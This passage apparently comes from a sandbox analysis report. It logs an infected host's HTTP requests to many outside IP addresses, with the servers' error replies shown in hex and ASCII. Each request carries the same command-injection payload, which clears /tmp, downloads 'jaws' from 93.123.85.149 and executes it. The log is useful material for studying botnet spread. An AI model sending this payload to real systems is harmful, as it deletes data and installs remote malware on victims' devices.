                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 30 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 49 74 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 72 65 71 75 65 73 74 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 400 Bad Request</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1><h2 style="margin-top:20px;font-size: 30px;">Bad Request</h2><p>It is not a valid request!</p></div></div></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            490192.168.2.235055266.77.110.7280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:32.488738060 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            491192.168.2.235296854.86.197.21780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:32.488871098 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            492192.168.2.2335510155.138.11.2080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:32.511749029 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:32.651738882 CET244INGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            493192.168.2.235896252.26.29.20980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:32.545696974 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:32.720010042 CET222INHTTP/1.1 503 Service Temporarily Unavailable
                                                            Server: awselb/2.0
                                                            Date: Fri, 26 Jan 2024 14:32:32 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Content-Length: 20
                                                            Connection: keep-alive
                                                            Data Raw: 44 6f 77 6e 20 66 6f 72 20 6d 61 69 6e 74 65 6e 61 6e 63 65
                                                            Data Ascii: Down for maintenance


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            494192.168.2.233634283.167.179.980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:32.574465036 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:32.801351070 CET512INHTTP/1.0 400 Bad Request
                                                            Content-Type: text/html
                                                            Content-Length: 345
                                                            Connection: close
                                                            Date: Fri, 26 Jan 2024 14:32:32 GMT
                                                            Server: lighttpd/1.4.54
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 Bad Request</title> </head> <body> <h1>400 Bad Request</h1> </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            495192.168.2.2334394138.2.243.10480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:32.597404003 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:32.823201895 CET321INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.23.2
                                                            Date: Fri, 26 Jan 2024 14:32:32 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 157
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.2</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            496192.168.2.2356960104.236.253.17480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:32.634717941 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:32.757582903 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:32:32 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            497192.168.2.2334662135.125.212.280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:32.808840990 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:33.025696039 CET525INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:32:32 GMT
                                                            Server: Apache
                                                            Content-Length: 347
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 400 Bad Requesterror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            498192.168.2.2351938103.221.252.5280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:32.832220078 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:33.295926094 CET404INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 15:02:13 GMT
                                                            Server: Apache
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            499192.168.2.235934478.187.235.23680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:32.918898106 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            500192.168.2.2336000219.251.84.17380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:33.033787012 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:33.385030985 CET490INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Fri, 26 Jan 2024 14:32:33 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            501192.168.2.2341980121.67.77.25080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:33.043387890 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:33.356442928 CET490INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Sat, 27 Jan 2024 11:30:59 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            502192.168.2.2340842103.151.120.21080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:33.084080935 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:33.441822052 CET380INHTTP/1.1 404 Not Found
                                                            Server: openresty
                                                            Date: Fri, 26 Jan 2024 14:32:33 GMT
                                                            Content-Type: application/octet-stream
                                                            Connection: close
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                            Access-Control-Allow-Headers: DNT,X-Mx-ReqToken,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Authorization
                                                            Data Raw: 4e 6f 74 20 46 6f 75 6e 64 0a
                                                            Data Ascii: Not Found


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            503192.168.2.233971823.10.129.13380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:33.568574905 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:33.699940920 CET430INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 208
                                                            Expires: Fri, 26 Jan 2024 14:32:33 GMT
                                                            Date: Fri, 26 Jan 2024 14:32:33 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 31 65 38 33 37 31 37 26 23 34 36 3b 31 37 30 36 32 37 39 35 35 33 26 23 34 36 3b 38 63 37 32 63 38 33 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;31e83717&#46;1706279553&#46;8c72c83</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            504192.168.2.234740663.32.147.23780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:33.778959990 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:33.992018938 CET401INHTTP/1.1 301 Moved Permanently
                                                            Server: awselb/2.0
                                                            Date: Fri, 26 Jan 2024 14:32:33 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 134
                                                            Connection: keep-alive
                                                            Location: https://127.0.0.1:443/shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            505192.168.2.23342122.37.191.14380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:33.834444046 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:34.078391075 CET622INData Raw: 55 4e 4b 4e 4f 57 4e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 32 36 20 4a 61 6e 20 32 30 32 34 20 31 34 3a 33 32 3a 33 33 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74
                                                            Data Ascii: UNKNOWN 400 Bad RequestServer: Date: Fri, 26 Jan 2024 14:32:33 GMTCache-Control: no-cache,no-store,max-age=0Prama: no-cacheX-Frame-Options: DENYExpires: 0X-Content-Type-Options: nosniffX-XSS-Protection: 0; mode=blockContent-S


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            506192.168.2.236099654.79.111.1980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:33.990530014 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
